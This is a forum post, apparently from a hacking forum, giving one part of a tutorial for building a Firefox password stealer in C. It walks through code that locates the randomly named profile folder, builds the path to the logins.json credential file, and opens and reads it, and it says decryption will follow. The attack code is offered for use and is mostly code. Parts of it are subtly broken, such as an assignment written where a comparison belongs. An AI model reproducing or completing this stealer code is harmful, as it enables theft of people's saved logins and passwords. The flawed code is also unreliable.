Stiller for Firefox

✨ deeznutz

✨ Master ✨
Staff member
Joined
May 15, 2017
Messages
981
Likes
754
Points
1,045
First, let's get the path to the Firefox password database. Remember, in our universal function get_browser_path we passed the parameter browser_family? In the case of Chrome, it was zero, and for Firefox we’ll set it to 1.

Code:
bool get_browser_path(char * db_loc, int browser_family, const char * location) {
...
if (browser_family = 1) {
memset(db_loc, 0, MAX_PATH);
if (!SUCCEEDED(SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, db_loc))) {
// return 0;
}

In the case of Firefox, we will not be able, as in Chrome, to immediately specify the path to the user's directory. The fact is that the directory name of the user profile is generated randomly. But this is not an obstacle, because the beginning of the path is known (\\ Mozilla \\ Firefox \\ Profiles \\). It is enough to search for the “folder” object in it and check for the presence of the \\ logins.json file in it “. This file is stored data logins and passwords. Of course, in encrypted form. We implement all this in code.

Code:
lstrcat(db_loc, TEXT(location));
// Объявляем переменные
const char * profileName = "";
WIN32_FIND_DATA w_find_data;
const char * db_path = db_loc;
// Создаем маску для поиска функцией FindFirstFile
lstrcat((LPSTR)db_path, TEXT("*"));
// Просматриваем, нас интересует объект с атрибутом FILE_ATTRIBUTE_DIRECTORY
HANDLE gotcha = FindFirstFile(db_path, &w_find_data);
while (FindNextFile(gotcha, &w_find_data) != 0){
if (w_find_data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
if (strlen(w_find_data.cFileName) > 2) {
profileName = w_find_data.cFileName;
}
}
}
// Убираем звездочку :)
db_loc[strlen(db_loc) - 1] = '\0';
lstrcat(db_loc, profileName);
// Наконец, получаем нужный нам путь
lstrcat(db_loc, "\\logins.json");
return 1;

At the very end, the variable db_loc, which we passed as an argument to our function, contains the full path to the file logins.json, and the function returns 1, indicating that it worked correctly.

Now we will get the password file handle and allocate memory for the data. To get the handle, we use the CreateFile function, as advised by MSDN.


Code:
DWORD read_bytes = 8192;
DWORD lp_read_bytes;
char *buffer = (char *)malloc(read_bytes);
HANDLE db_file_login = CreateFileA(original_db_location,
GENERIC_READ,
FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE,
NULL, OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
ReadFile(db_file_login, buffer, read_bytes, &lp_read_bytes, NULL);

Everything is ready, but in the case of Firefox, everything will not be as easy as with Chrome - we will not be able to simply retrieve the necessary data with a regular SELECT query, and encryption is not limited to a single WinAPI function.
 
Top Bottom